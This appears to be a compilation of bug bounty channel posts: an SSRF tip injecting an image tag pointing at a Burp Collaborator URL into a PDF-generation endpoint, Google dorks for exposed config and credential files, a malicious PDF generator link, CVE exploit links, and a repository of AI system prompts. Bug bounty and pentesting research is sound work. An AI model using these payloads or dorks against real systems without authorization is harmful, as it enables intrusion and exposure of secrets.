Bug bounty Tips

Hey Hunter's, DarkShadow here back again! SSRF in pdf generation! this api endpoint send the pdf generation request: POST /api/v1/convert/markdown/pdf Add this payload: <img src=‘burp collab url’ /> comes 200ok and hit request in burp collaborator. You can follow me in my x.com/darkshadow2bd #ssrf #bugbountytips

🔥Oneliner to download ALL of @assetnote's wordlists: ⌨️ wget -r --no-parent -R "index.html*" wordlists-cdn.assetnote.io/data/ -nH -e robots=off

☄️ Cheapest VPS for Bug Bounty & Pentesting ⚠️ https://brutsecurity.medium.com/cheapest-vps-for-bug-bounty-pentesting-fc6686572ee3

Google Dork - XSS Prone Parameters 🔥 site:example[.]com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:&

☄️ Malicious PDF Generator - Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh ✨ https://github.com/jonaslejon/malicious-pdf

🔥Google Dork - Exposed Configs 🔍 site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json ©TakSec

#exploit #AppSec #Threat_Research 1⃣ Zimbra Exploit Analysis (CVE-2025-27915) https://strikeready.com/blog/0day-ics-attack-in-the-wild // These exploits take advantage of .ics files to breach vulnerable systems 2⃣ Notepad++ DLL Hijacking (CVE-2025-56383) https://github.com/zer0t0/CVE-2025-56383-Proof-of-Concept // If the threat actor has the ability to replace an applications DLL, they would have to ability to put malware directly in the same location... 3⃣ Lenovo Display Control Center - A simple ACL Exploit (CVE-2024-2175) https://neodyme.io/de/blog/lenovo_dcc_lpe_logic // Two operating methods are presented for achieving local administrative access: a race condition-based approach and a junction path exploitation technique

I request a small support in boosting my channel where it help me to be more consistent and more active... https://t.me/boost/bugbounty_tech

based on the poll, i have understood is the members of group are looking for AI content too.. thanks for all the responses and i will make plan what content should be add here and what not .

Johnermac >eJPT >eCPPTv2 >PNPT >eWPTXv2 >Active Directory Exploitation >CRTP >CRTE >CLOUD >CONTAINER Link 🔗:- https://johnermac.github.io/

↳ Pentest References and CheatSheets • Hacking Articles • Hack Tricks • Cloud Hack Tricks • Chryzsh Pentest Book • Total OSCP Guide • Hack The Box OSCP Preparation • Steflan Security • SecWiki • Hausec • HighOnCoffee • six2dez pentest-book • 0xffsec Handbook • haax's Cheatsheet • golinuxcloud • Pentest Monkey • Web App Testing Guide • XSS CheatSheet • Payload Box • Steganography Tools • Metasploit Unleashed • Payloads All The Things • Mobile Security Testing Guide • WADComs • LOLBAS • explainshell #infosec #cybersecurity #bugbounty #pentest #cheatsheet ➯ Share & Support Us ➯ Channel : @Hide_Club

A library of tools for vibe coding https://github.com/x1xhlol/system-prompts-and-models-of-ai-tools